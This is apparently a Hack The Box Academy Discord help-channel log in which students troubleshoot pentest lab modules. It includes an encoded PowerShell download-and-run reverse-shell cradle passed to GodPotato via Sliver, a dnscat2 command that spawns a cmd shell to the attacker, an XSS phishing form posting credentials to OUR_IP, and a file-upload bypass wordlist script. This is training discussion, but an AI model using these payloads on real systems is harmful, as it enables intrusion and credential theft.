#modules
no curl fails after trying for some time
i mean, its a good password list but may not give you what you want 😉
then its a connection issue. you need to figure out if its your VM and maybe not having any adaptors passed through?
It's because I used locate / xato and used the file that ended in .txt without reading the whole thing
thanks tho!
https://academy.hackthebox.com/module/51/section/1590
Need help with privilege escalation
realistically, you should google your issue where you have a connection, something like "VM won't connect to websites" and go through the steps
why would u use a password list to fuzz for username?
i dont think there's a benefit for that
haha its all good mate. ive done even more silly things before. always helps to have another set of eyes for those things.
no theres not. hence why i posed it as a question to him .... which is likely the problem....
Oh lmao, all good
i mean, i could be wrong with that being the issue. but password list for users is still not ideal lol.
It definitely is the issue haha
Can confirm, just found the username
great!
Hello ! I am stuck in password attack skill assessment .
I got initial access via ssh and found credentials for hwilliam but I don’t know how to proceed
Getting Started - Knowledge check
Hi everyone, yesterday i used msf to exploit the target and it worked, but now it says that the target is not vulnerable, some help? I have spawned the target today, so its not expired
Hello Members,
Can anyone help with the Value Fuzzing topic
curl -X POST -d "id=<I have the value>" http://admin.academy.htb:30746/admin/admin.php but I am not able to get the flag, as it says "you do not have the access". What does it mean?
did you manage to get the answer as it says for me that = You do not have access to it
has anyone completed the Android Application static analysis module?
did you manage to get an answer ? , I am stuck at the same
🙏
Network works at layer 3 (IP/ICMP) → your VM can reach external hosts by IP.
Network fails at layer 4 (TCP 80/443) → connections for web/apt/curl are blocked.
DNS works, so name resolution isn’t the problem.
Firewall inside VM is not the issue.
HTB VPN or NAT mode is likely interfering with outbound TCP connections.
Conclusion: The VM’s TCP traffic is being blocked due to network mode (NAT vs bridged) or host firewall / routing.
i still dk whats going on .. ive been stuck here for 2 days now
I am stuck at password attack skill assessment . I got initial access and found william credentials but I do not know how to proceed …
DM me please
Read the sections again carefully and you'll then come to understand what you were doing wrong.
Whenever I try to unzip SOCKS over RDP zip...
.dll is automatically deleted...any solutions....windenf is OFF
Check TARGETURI option again. It's asking for the base path to the CMS.
Where did you get stuck?
Hello all, Ive almost completed my BBH path should I wait or take the exam
Hello, may someone help me reall quick please?
https://academy.hackthebox.com/module/77/section/852
Ive been following the guide so far and have seemed to somehow gotten myself stuck. the file is uploaded, but i cant seem to get the directory pull in order to get the information needed to continue. any clue what I did wrong?
Guys, I'm on https://academy.hackthebox.com/module/143/section/1455
Trying to solve the question as follows, but I keep getting the same error and with no outbound Internet access on ea-attack01 I'm unable to sync the time, but from what I can tell, there's no issue with the time.
||┌─[htb-student@ea-attack01]─[/opt]
└──╼ $sudo kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt
Version: dev (9cfb81e) - 08/16/25 - Ronnie Flathers @ropnop
2025/08/16 09:48:54 > Using KDC(s):
2025/08/16 09:48:54 > 172.16.5.5:88
2025/08/16 09:48:54 > [+] VALID USERNAME: jjones@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [+] VALID USERNAME: sbrown@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [+] VALID USERNAME: tjohnson@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [+] VALID USERNAME: jwilson@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [+] VALID USERNAME: bdavis@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [+] VALID USERNAME: njohnson@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [+] VALID USERNAME: asanchez@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [+] VALID USERNAME: dlewis@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [+] VALID USERNAME: ccruz@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [!] mmorgan@INLANEFREIGHT.LOCAL - KRB Error: (11) KDC_ERR_NEVER_VALID Requested starttime is later than end time
||
I’m doing the aen module and ||I noticed an AD group doesn’t display as vulnerable in bloodhound||, but in the walkthrough it does display as vulnerable. I’ve tried installing the newest bloodhound software (which I thought was via docker) and it’s still not displaying. Am I doing something wrong ?
Solved my own problem lol
I've tried syncing the time with the DC using ntpdate, but ntpdate is not available on the machine 🤷♂️
||sudo ntpdate -s 172.16.5.5||
https://academy.hackthebox.com/module/77/section/852
back again, my ncat isnt loading, just says listening on any
Cheers - no rdate, but I'll try a change in the VPN 👍
No, vmware. Kali, with Windows as the base machine
can someone help me understand something in the way live targets works ?
I've put the vpn but when i visit the link its the default apache page,
and for the vhost i don't understand i just have the name
Hallo!
Absolute star ⭐ - It was something to do with the VPN region. Thanks for the advice! 💪
Tag! I believe it's English only on the server 😁
Well i guess the target ip should be a vulnerable web app, but i get the default page, and in the module they talk about vhost like exploitserver.htb where we put our payload but i just have the name not the ip
I am English, I just use hallo for funsies
FFS - I almost brought my German out on you
Advanced XSS and CSRF Exploitation - the lab warmup 😢
So, im sitting with the file directory open, however the ncat doesn't seem to be working
well thats what i don't understand the other web module i tried was more simple, it just had an ip with the vulnerable app,
i don't understand what do i have to do to connect to the vulnerable website and send the payload
im sorry its maybe a stupid question but i really don't understand how the setup works
but i don't have any ip for them
hooo i self host ?
yes
@unkempt ore - I think you would benefit from reading a bit about the basics of vhosts. Then your understanding of them and how to interact with them will become simpler for you.
To add @unkempt ore - https://academy.hackthebox.com/module/144/section/1257
I agree i just used vhost once for selfhosting with a custom name but didn't searched more on what it does
can i dm ?
Okay my bad i had two devices on the vpn that why i guess it wasn't working, Thanks All
moderator is staff btw, just wanted to let you know if youre not staff dont pretend to be. you can confuse people especially if you only text in vague two word sentences.
The moderators are usually not employees. Employees also have the role HTB Staff.
They literally help people in here all day for free and you’re mad at them 😂
i have doubt in this module that whether i need to connect a android device or use emulator
I have a trouble I`m doing password attack module and I have a last question: Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer. I got user and password but smb shares only have one privilege READ ONLY in IPC$ share
I got username and password using netexec smb module. And active shares. But then when I checked them with SMBMAP I found that all shares except IPC$(READ ONLY) have denied access. So I cant get a flag: Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.
is the only different the name? Or in other words, the module is still completely relevant if the cme is substituted for nxc?
I completed the module using nxc only. Had no issues at all.
thank you!
really need help with that, here is the link https://academy.hackthebox.com/module/147/section/1327
Attacking Thick Client Applications
https://academy.hackthebox.com/module/113/section/2139
i modify 554.bat file and run it and just create 2 file in c:\programdata but HTB say it will create 3 files .
```
-a---- 3/24/2023 1:01 PM 273 monta.ps1
-a---- 3/24/2023 1:01 PM 601066 oracle.txt
-a---- 3/24/2023 1:17 PM 432273 restart-service.exe
```
but i see in the screenshot one file `restart-service.exe` is missing. what to do?
There have been some updates to the options for some of the modules and protocols, but it's definitely not a show stopper.
SMB 10.129.202.136 445 WINSRV [+] WINSRV
SMB 10.129.202.136 445 WINSRV [*] Enumerated shares
SMB 10.129.202.136 445 WINSRV Share Permissions Remark
SMB 10.129.202.136 445 WINSRV ----- ----------- ------
SMB 10.129.202.136 445 WINSRV ADMIN$ Remote Admin
SMB 10.129.202.136 445 WINSRV C$ Default share
SMB 10.129.202.136 445 WINSRV CASSIE
SMB 10.129.202.136 445 WINSRV IPC$ READ Remote IPC
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.129.202.136:445 Name: 10.129.202.136 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CASSIE NO ACCESS
IPC$ READ ONLY Remote IPC
Used credentials that HTB gives in the module
Hey guys, does anybody know of some boxes that I could use as practice for Pass the Ticket attacks on both Windows AND Linux domain joined systems?
Working on "DNS Tunneling with Dnscat2" for CPTS but I am stuck because of an error here.
For server:
sudo ruby dnscat2.rb --dns host=10.10.14.216,port=53,domain=inlanefreight.local --no-cache
At client side:
Start-Dnscat2 -DNSserver 10.10.14.216 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd
(yes i am copying and verifying same secret at both sides)
But I get this error below. I tried a lot to solve this issue but still the error is here.
Update-Dnscat2Session : Dnscat2: Failed to ConvertTo-Dnscat2Packet...
At C:\Users\htb-student\Desktop\dnscat2.ps1:2098 char:41
+ ... $Sessions[$SessionId] = Update-Dnscat2Session $Sessions[$SessionId]
+ ~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorException
+ FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Update-Dnscat2Session
Sorry Im new to htb discord. I'm not sure if its the right place to ask questions.
Thank you!
The error has fullyqualified in it which leads me to believe it may be related to not putting inlanefreight.local in your hosts file
should I put inlanefreight.local against the generated ip for the module?
One more thing:
PS C:\Users\htb-student\Desktop> nslookup inlanefreight.local 10.10.14.216
Server: UnKnown
Address: 10.10.14.216
DNS request timed out.
timeout was 2 seconds.
DNS request timed out.
timeout was 2 seconds.
*** Request to UnKnown timed-out
yeah just use the target IP
Try using credentials that you have identified while answering previous questions.
thx, solved already netexec stopped when find matching user and password but it have 3 matches
You can add this next time you are doing something similar --continue-on-success
yeah I found out it while researching, thx
hosts:
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.42.198 inlanefreight.local
but still the same error.
You're doing nslookup from the target not your own machine
yes its the target machine
ok so do you still get the error on your kali box
In this command you're trying to lookup inlanefreight.local using your kali box as the nameserver. that's not how it works, your kali box isn't running a nameserver. your hosts file simply tells your kali box which hostname should be resolved with the ip you put in there.
Clarification:
my Attack host ip: 10.10.14.216
Target ip given: 10.129.42.198
- I tried to run nslookup from the target to my attack host.
- I edited my host file on my attack host as you said.
Yeah that's not going to work due to the reason I stated above, your kali machine isn't running a nameserver/dns server.
the original error you posted was due to running ruby dnscat2.rb on your kali box. to rectify that error you should first try adding the spawned ip into your hosts file with inlanefreight.local
then try running the ruby command again to see if the error still happens
I added inlanefreight.local to my host file (on Attack host kali linux)
but still the error is there.
I tried changing servers as well.
oh i'm sorry i misread your first post, i see you posted results from both boxes i thought it was only the kali box
No worries. So what should I do?
are you running powershell as admin?
yes
- I tried sudo iptables -A INPUT -p udp --dport 53 -j ACCEPT
- UDP connection is working as well.
exhausted chatgpt gemini as well to sort out the error. This is last resort.
Hi
i am not sure i would probably need to see the full setup, your commands seem fine
Please I need help

@dense pagoda This server isn't for that.
Where can I find a server for that please
if i want practice material, is academy a good alternative to retired boxes?
So far thank you very much. Please let me know what you need to analyze further this problem.
Academy is the learning platform, it teaches you how to attack and gives challenges at the end of each section. I wouldn't really say it's for practice, more for coming up with a good playbook and learning things. Boxes/Fortresses/Challenges/Prolabs/etc are for practicing
Unfortunately I can't help right now sorry maybe someone else can help in DM or something
ok i need a good playbook and to learn
Then yes you want Academy
are you able to recommend where i should start in academy (any must-have modules?), or should i just pick what interests me?
I would say follow the path for the topic that interests you most. Internal/external pentesting = CPTS path. Web pentesting = CBBH path (CWEE is the advanced web pentesting path). Defensive/blue team stuff = SOC Analyst path, etc.
you recommend against picking individual modules?
You can, but some of them rely on knowledge from previous modules in the path
Hello all, I need some advice I've almost completed my BBH path, would you recommend me to take the exam, or after the update.
Is it just me, or does anyone else find that the output flag -o <filename.txt> doesn't work with userenum? The command runs through, but the output file is empty. 🤷♂️
Maybe try this channel? https://discord.com/channels/473760315293696010/958071178713514045
I just finished Firewall evasion easy https://academy.hackthebox.com/module/19/section/117
Anyone have a minute to talk about the hint? I was unable to tell if a certain part of it was helpful or not though i ultimately didnt make use of it and curious if i missed out on the benefit of something
prob best for DMs so I dont spoil
Hi 🙂
Anyone up to discuss firewall hard skill assessment? im on the right track, sorta but im having probs https://academy.hackthebox.com/module/19/section/119
hi i need help, im doing the "Linux Fundamentals" and im at "System Information", the problem im having is connecting using ssh, i spawn a target, i type everything correct "ssh hbt-student@10.129.246.44" but when i press enter, nothing happens, its just blank, then after ~2min i get this ssh: connect to host 10.129.227.96 port 22: Connection timed out. Help please! i aint trying to get stuck here.
Any moderators on who can help?
Been experiencing the same problem over here too.
In Password Attacks Pass the Ticket (PtT) from Linux:
I'm getting this error for this command:
smbclient //dc01/julio -k -c 'get julio.txt' -no-pass
Error:
gensec_spnego_client_negTokenInit_step: Could not find a suitable mechtype in NEG_TOKEN_INIT
session setup failed: NT_STATUS_INVALID_PARAMETER
I successfully ran the cp and export command in this module prior to this.
man im just trying to lurn over here haha, do you have the instance on?
@sharp cove can you help us?
Got to extend with another hour to keep the Pwnbox lifecycle long enough.
can i PM you how it looks on my side?
Hi Guys.
What do you know about instagram security?
is it a profession?
Yes you can
just sent you a PNG
With what? Im afk right now
i can't connect using ssh
this @sharp cove
@cloud urchin are you there?
Please do not randomly ping people. Just ask your question here and if someone can and is willing to help they will.
Are you willing to help?
i am busy, but your error is network related. make sure you're on the vpn and not using the pwnbox at the same time.
Anyone into CTF here?
Not the right channel for that. Please follow the instructions in #welcome to gain access to other channels.
Are you AI
nope. @compact patrol is a bot though
Hi everyone, can someone explain how Nmap host discovery works? Particularly about the type of packet sent
that will depend on the options you use in your nmap command
I am reading the documentation and this is what it says about the -sn option: "The default host discovery done with -sn consists of an ICMP echo request, TCP SYN to port 443, TCP ACK to port 80, and an ICMP timestamp request by default". If the -sn option disables the port scanning, why does nmap perform a port scan?
Are you still working on this?
-sn will only send packets to TCP/80 and TCP/443. by default, Nmap scans the top 1000 common ports. -sn doesn't do that. that's what it means by no port scan
why it sends a packet to 80 and 443, i'm not really sure
so with -sn the only ports that get scanned are 80 and 443?
from the way the documentation is written, it doesn't sound like those ports are even being scanned. Nmap just sends a packet to them
but maybe that's not true. if you run the command, if it doesn't specifically show 80 and 443 in the results, then it's not scanning those ports
Anyone got a sec for the nmap firewall hard lab? I feel like i should be getting a flag (finally) but im... not?
maybe i need to restart box. let me try that real quick now that i have my lil approach
Do you advise to read all the nmap documentation?
you don't have to read all of it, but you should have a basic understanding of what the tool is doing
Yes
I will help me. You may DM me for help. Start with what you are running and the output you are getting.
Hello
Dang i was going to try and help but I don't think i did that section. Looks like they have updated a few sections on that module since i did it. Sorry brother
cd ~
solved this issue
Hey! by any chance, is there any one who had already finished the updated Password Attacks SkillAssessment?
I finished it when there were 3 parts but now it's updated and I can't see a way to go further after accessing through ssh. Module says there are 4 internal hosts (172.16.119.X) but only 2 are reachable.
In Password Attacks Pass the Certificate:
When trying to run:
python3 gettgtpkinit.py -cert-pfx ../pywhisker/pywhisker/1UCYb0YS.pfx -pfx-pass '1P9EvC2tKKJlBSum4Ej4' -dc-ip targetIP INLANEFREIGHT.LOCAL/jpinkman /tmp/jpinkman.ccache
I get this error:
2025-08-16 20:43:06,994 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
Traceback (most recent call last):
File "/home/htb-ac-874050/PKINITtools/gettgtpkinit.py", line 349, in <module>
main()
File "/home/htb-ac-874050/PKINITtools/gettgtpkinit.py", line 345, in main
amain(args)
File "/home/htb-ac-874050/PKINITtools/gettgtpkinit.py", line 302, in amain
ini = myPKINIT.from_pfx(args.cert_pfx, args.pfx_pass, dhparams)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/htb-ac-874050/PKINITtools/gettgtpkinit.py", line 47, in from_pfx
with open(pfxfile, 'rb') as f:
^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '../pywhisker/pywhisker/1UCYb0YS.pfx'
its saying that the .pfx file doesn't exist. thats your error
You have this 1UCYb0YS.pfx?
if you need to, find the absolute filepath to the file, and use that
oh ok
@alpine mural Please take care not to post content from modules above tier 0
OK.
i wouldnt include the password for the user in that lol
There is no need to post details at all. Anyone who has done the module and can help knows the details. Just state the module/section/question you're on, maybe post the error itself, or obfuscate things. Best to take it to DMs if you feel like you need to reveal a little more.
aaa...ok.
I got this error in Pass the certificate in passwords attacks. I can't get the .pfx. I don't understand the reason.
its part of the terms of service that you don't share information for modules above tier0. they dont want ppl searching through chats to find the answer to things instead of figuring it out. you can ask for help obviously, just don't give away key bits of information (especially since others will want to do modules in the future, and what is seen can't be unseen ...)
Yes,yes...my error, sorry.
If the lasts picture are wrong, let me know and DM to you
ah, so i think the issue is OpenSSL.CRYPTO as its a known issue. if i remember correctly, you have to patch that specific pkinittools
Configuration impacket version: 0.11.0 Python version: 3.11.8 Target OS: Kali Linux Debug Output With Command String ntlmrelayx.py -t ldaps://domain.com --shadow-credentials -smb2support --no-dump ...
i know someone who setup a pyenv just for this fix/patch so he didn't have to patch and unpatch the issue moving forward.
Oh...thank you very much for that link.
let me know if that solves the problem
you may need to undo that patch for future work, so just keep that in mind
Yes. I create a env , and i put in my notes the link and the step by step to do.
great work
-sn in Nmap means "ping scan only" (no port scanning).
That means Nmap will only check if the host is alive (host discovery), not enumerate open ports.
When Nmap tries to decide if a host is up, it doesn’t just send ICMP Echo (ping). Many networks block ICMP. So, by default, it also sends:
ICMP Echo request
TCP SYN to port 443 (HTTPS)
TCP ACK to port 80 (HTTP)
ICMP timestamp request
These are not port scans in the sense of “check all ports systematically”. They are simply probes to elicit any response from the host. If the host replies, Nmap marks it as "up". If not, it may mark it as down (unless you disable host discovery with -Pn).
Yes, you need to install the app on the device for analysis.
I personally use Android Studio, but you can go with whichever option is easiest for you.
if you still need help with this, feel free to DM me 
Did you get answer for your question?
can anyone help me with nibbles
im not about to get a reverse connection
anyone?
What have you tried so far?
ive saved my php file and tried to get a reverse response when i curl it but i got no response
show with screenshots what you're doing, it's a tier0 module so no problem spoiling it
your process of getting the reverse shell
Hello, I'm struggling with XSS assessment.
I can't even get a callback to my web server in any input field, with all the payloads from the module (and much more). I tested variants of the payload I got success with for session hijacking exercise.
Moreover, when shutting down the machine and starting a fresh one, I do not get the same results each spawn. Sometimes I see my comment appear, with a "waiting for moderation" note, sometimes I do not see my comments. On spawns where I see my comments, I suspect there is some kind of filter on < character, completely eluding my payloads, as I get errors duplicate messages for such cases.
I saw in some messages that the payload should be simple, but it does not look like working for me.
Are you still able to perform XSS on the website ? Any tips otherwise ?
Thank you
type csrf in academy search
use search feature..it will show all the modules regarding that
Ty
Cheers 🙂 Is sqlplus supposed to be pre-installed on pwnbox? I came across two instances in the CJCA-path which read like sqlplus should already be installed 😄
If its the Advanced CSRF and XSS module you can dm me
Unfortunately it's the classic XSS one
Did you check for cors errors?
I got no call to my server at all, running a web server with python http.server, which works fine in a previous section of the module
bump
And there are no other errors in the console ?
Can anyone help me with dnscat2? I am getting error while connecting from client to server. Thank you!
My post returns 302 when sending my payload, and I can't see the console for the injection afterwards as it's blind XSS for the admin of the website
Try the payload on yourself first if you can, maybe theres some js error or cors. To bypass cors you can use window.location
On spawns where I can see my comments, I tried, but can't achieve to bypass the filters. However, the fact that the behavior is not idempotent across machines makes me think there is something wrong with the machine.
Working on "DNS Tunneling with Dnscat2" for CPTS but I am stuck because of an error here.
For server:
sudo ruby dnscat2.rb --dns host=10.10.14.216,port=53,domain=inlanefreight.local --no-cache
At client side:
Start-Dnscat2 -DNSserver 10.10.14.216 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd
(yes i am copying and verifying same secret at both sides)
But I get this error below. I tried a lot to solve this issue but still the error is here.
Update-Dnscat2Session : Dnscat2: Failed to ConvertTo-Dnscat2Packet...
At C:\Users\htb-student\Desktop\dnscat2.ps1:2098 char:41
+ ... $Sessions[$SessionId] = Update-Dnscat2Session $Sessions[$SessionId]
+ ~~~
+ CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorException
+ FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Update-Dnscat2Session
Not familiar with dnscat nor windows, but this exception makes me think of a permission error. Maybe trying with elevated network privileges ? 🤷
I am local host on windows machine (which is part of lab). Running powershell as an admin.
@void matrix Not that kind of server. This server is for discussion about HTB.
Anyone care to help me a little bit? I'm stuck on the "Windows Lateral Movement" module, Section "Windows Remote Management" and Question #3 with getting the flag on DC01 as Leonvqz.
I can forge the user's ticket but can't "Enter-PSSession" been stuck for quite some time now..
I've tried everything I can think of and nothing seems to work. I'd highly appreciate if someone could just give me small nudge
you can DM me
Do you get the error on the server or the client? Can you use a higher port number above 1024? Maybe the firewall is blocking writes on that port
the error is on client side.
When I initiate connection from client side, the server gives me prompt where it says connection established, at the same time the client side (which is windows part of lab) gives this error.
I think client-server are struggling to maintain the connection.
I tried sudo iptables -A INPUT -p udp --dport 53 -j ACCEPT
UDP connection is working as well.
exhausted chatgpt gemini as well to sort out the error.
Well actually made it work, I'm pretty sure I already tried the payload that worked there in the past without success, looks like it's not so reliable 🤷 Thank you anyway!
anyone can help with the payload crafting
document.createElement('form');f.action='http://OUR_IP';f.method='POST';var u=document.createElement('input');u.type='text';u.name='username';u.placeholder='Username';f.appendChild(u);var p=document.createElement('input');p.type='password';p.name='password'
If somebody manages it and tells me Ty
That's not what this server is for.
Ok
Guys, I am stuck with the XSS. I have the payload, which is working perfectly, but when I am trying to send it via SEND ME A URL it says invalid url
Leave it I have solved this one !!! 🙂
Module Intro to C2 Operations with Sliver
How would I execute this command against a sliver listener
execute-assembly /mnt/hgfs/HTB/www/GodPotato-NET4.exe -cmd "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA1AC4AMgA5AC8ASQBuAHYAbwBrAGUALQBQAG8AdwBlAHIAUwBoAGUAbABsAFQAYwBwAFIAdQBuAC4AcABzADEAIgApAAoA"
⚠ Injected .NET assembly arguments are limited to 256 characters when using the default fork/exec model.
Consider using the --in-process flag to execute the .NET assembly in-process and work around this limitation.
hi im in Advanced SQL Injections module and i think there is problem with instance
error: port 8080 already in use
how deep are you in the scenario? can you restart the box perhaps its soggy?
if its not too much of a hassle i would restart the target and then try to launch the application again and see if you get the same error.
until someone who's done the module before can give some better help
i did and same problem
i cant be of MUCH more help here but i would try
sudo lsof -i :8080
and see if you can identify whats running on the port.
if that is no help try nmap on 8080 with an -sV
or perhaps giving it a port other than 8080 to run on? (if like something ELSE thats NOT your sql server is running on 8080 and needs to be)
if the sql server is running on 8080 maybe try kill or pkill or whatever then retry
hello, someone can help me in whitelist filters on file upload attacks module

yea, i know where the files are uploaded
but i not found my shell
I tried shell.php, shell.jpg, shell.php.jpg
etc etc
I use php list with the intruder, and i have like 3 successful uploads
the others give the error " only image allowed " or " extension not allowed"
i use this
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\' '.' '…' ':'; do
for ext in '.php' '.phps'; do
echo "shell$char$ext.jpg" >> wordlist.txt
echo "shell$ext$char.jpg" >> wordlist.txt
echo "shell.jpg$char$ext" >> wordlist.txt
echo "shell.jpg$ext$char" >> wordlist.txt
done
done
and i use it with the intruder
okay, but i already have 3 with successful uploads
i use it too
okay
wait , i send again the intruder with the other list
and 2 more
i delete it after
its only to show how im doing the things
whats PM? im not english, i dont know all the abbreviation
dm?

okay okay, i was reading pm and i dont know jhajsajsa
that makes sense
new word learned
i did this module a year ago but dont remember it
but i do remember that being a headache
i think awoken is high lmao
😂
bro cracked every possible word could be generated
hahah
@cunning canopy which exam you are preparing for?
anyone can help with
using crackmapexec module
skills assessment
stuck on the second question, already got the s*** user, and I cannot go further from in there
Yeah i know but is this possible?
- 2nd..you are in wrong channel
only modules related chat here
#general for off topic chats
Okay 🫡
I was just asking
Hello everyone
Can anyone suggest me ...how to take note the modules in HTB academy and Linux app...!!?
there are a lot of video on youtube
Hey guys in the Password attacks module , the section Pass the hash https://academy.hackthebox.com/module/147/section/1638
I already solved the question with mimikatz.exe, but I wanted to know is it possible to use netexec to achieve all the NTLM hashes using a local administrator hash?
I thought of dumping the lsa secrets, but it only got me the plain text password, and when I tried to dump the SAM database it didnt show any NTLM hashes for the user David
Thanks in advance
Give me the link
Dm me
Hey, if anyone is currently working on CPTS, please reach out to me!! I'm on web proxies and moving forward from there!!
Should test authentication using relevant protocol and then go from there.
If you still need help DM me
Oh I didn’t see Ricky responded
yes, I have found it, the DB, but its empty
Think how you can check to see if you can get different privileges. There's a module you can use.
Hi, has anyone completed LLM Output Attacks module from AI red teamer path?
I managed to get the admin key and the hashed admin password. I am trying to use the admin bot but have not been able to know where the flag is. https://academy.hackthebox.com/module/307/section/3597
https://academy.hackthebox.com/module/77/section/852
For this, where do I find the listening port i need to use for the PHP code
do I need to nmap??
could be any port on your system for callback that's not already in use.
CAN SOME ONE PLEASE SHARE THE FLAG OF https://academy.hackthebox.com/module/113/section/2164
its so frustrating....
Anyone gotta sec to soundboard for the DNS section https://academy.hackthebox.com/module/112/section/1069
im headed in the right direction and know what i need to do, just having some problems picking the right direction to focus on due to the time sink involved with 4-5 options
If you’re still stuck, you can dm me (just you)
Thank you for offering to assist! I finally managed to solve it
Still looking for a lil direction on the DNS AXFR module https://academy.hackthebox.com/module/112/section/1069
Great job
@quiet trout can dm me
What happens when you finish all Hack The Box modules? Because you have nothing to keep your streak going on. But if I finish all the modules, how can I continue my streak?
This isn’t a hacker for hire server though
If it’s illegal, this isn’t the place for it
Cyber line
Am lost i need help
Don’t ask to ask, if you need help with a module, name the module and section 🙂
anyone else's Pwnbox terminate while they were practicing linux commands in the linux fundamentals module?
How come I do
inline-execute-assembly /home/kali/Tools/CustomCollection/SpoolSample.exe 'dc01 srv01'
But my rubeus monitor only catches the srv01 tgt which is the one im monitoring from trying to get the dc01 tgt...
What module is this for?
sliver module section = kerberos
could it be because the TGT for the DC01 is already cached ? so the delegation does not occur after checking if the TGT is already there ?
Haven’t done this module, sorry 🙂 but I’m sure someone else has
hey guys can you help me out here
like is that a glitch or something
Are u gonna be mega hax0r
U can tell me the module and exact section and ill give u a hint
no i have actually started today so i just want to learn
Good job
What?
i am stuck in these questions
hi
wdym you're stuck? you literally have the correct answers typed in, just submit
have you tried IP?
can someone explain why i keep getting this error in the pass the certificate section from the password attacks module
yes
try IP and Network Management Software
well then I have no idea 🌚
TCP/IP
@fair charm
"OMG IT WORKED WITH CAPITALS " lol i did not know it htb answers are case sensitive
it shouldn't be 🙂
hoo i dont know i am new to htb and every thing
guys I just got a message saying GG on leveling up! You can type /rank to see your rank card in HackTheBox. 😉
what does that mean?
what is this
/rank
no idea, I am asking
/rank
yep nothing happened
holy shit what is slow mode?
so I can't make more than one message in 5 seconds?
sync your clock
hoo okay can we be friends i just sent you request
I accepted right away
really thanks mate 🙂
danke
For Credential Hunting in Network Traffic they have you download a pcapng file to analyze but I don't have a VM to check this, I just connect to the workspace. How do I transfer it over?
So I tried and tried to solve this question but nothing worked, and ChatGPT was no good either, everything it suggested failed. Anyone has an idea how can I solve this question?
how do I attach an image here?
hello, need helps in skills on file upload module
- button on left
use printscreen and paste it simply with CTRL+V
already 🫡
Verifying your account will give you image permissions here
that gives me USE APPS only
I'm not on windows
why could that be
did you connect to htb account with discord ?
👋
need to verify
yeah I was going one message at a time😅
thx guys
ha yes he need to add his htb discord id here ig
ah that's right
Anyone got a sec for POP/IMAP https://academy.hackthebox.com/module/112/section/1073
I am able to see my inbox(es or lack thereof) but dont see any emails.
hey i have doubt so are you guys active all the time like moderators or you guys take shifts ?
No shifts, we’re all volunteers 🙂
so you stay all time online ?
hoo okay
I tried random answers until I got it right
but I want to know how is it really solved?
I know I should start with curl then grep then sort then wc
the problem is with using grep, it returns the entire line and not only the link, that way I can't use sort correctly
i dont understand your question
any suggestions?
you already connect ?
yes im connected and logged into both pop3s and imaps with openssl and i've listed my inboxes but i have no emails
i have no spam/trash or anything
LIST "" *
with this command you dont receive any input?
I do i receive an inbox with no email
can you send me what u receive, im looking my notes and i have 2 folders
Sorry I read rules but it says read modules
any ideas?
@weak vapor Please take care not to post answers from modules
shit, I forgot that!
I need help with this question
maybe you should enumerate the paths using gobuster
need help with these two questions in Footprinting Module DNS Section
I don't think so, the question says using curl
besides, gobuster needs wordlists
If you have the source code you can maybe check the endpoints manually
how much manually do you mean? I won't read the whole thing and count
I tried grep but it keeps being the wrong answer, so I'm guessing I'm using it wrong
What module is that ?
check DM

hi guys im trying to solve the AD enumeration and attacks module
and im connected to a host via SSH.
im trying to clone kerbrute from github but i get this message.
Cloning into 'kerbrute'...
fatal: unable to access 'https://github.com/ropnop/kerbrute.git/': Could not resolve host: github.com
help please
it is normal htb target machines dont have internet connection
you should have kerbrute on your attack host (vm or pwnbox)
Given the capture file at /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in hex and ascii?
“-rX ~/tmp/capture.pcap” and its wrong
Hi chat, in *Coercing Attacks & Unconstrained Delegation* of the Windows Attacks & Defense module, do you know where can i find the Coerce executable to run the Coerce command ? I ran a locate and a find on both my home and the /usr/share/. but no sign of it.
nvm
hi. i dont have permission to send messages in the general chat
maybe i used the link from the academy thats why ? or no ?
thanks
sorry to bother but it says to contact an admin because the verification failed
Sorry I am not an admin, I am just a dude playing a dude disguised as another dude. On the serious side, I've seen this before, let me try to find that and see what answer was given.
ok
I found the post. Let me see if I can find someone online that can help.
I've been slowly working on the "Using the Metasploit Framework" project. I'm currently focusing on sessions and jobs, but I'm getting an error. I did some research, and everything I'm finding suggests that the target is either not vulnerable or has already been patched. Am I missing something, or did I do something wrong?
Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Pi-Hole version 0 is ≥ 5.3 and not vulnerable "set ForceExploit true
to override check result.
You can send me a DM
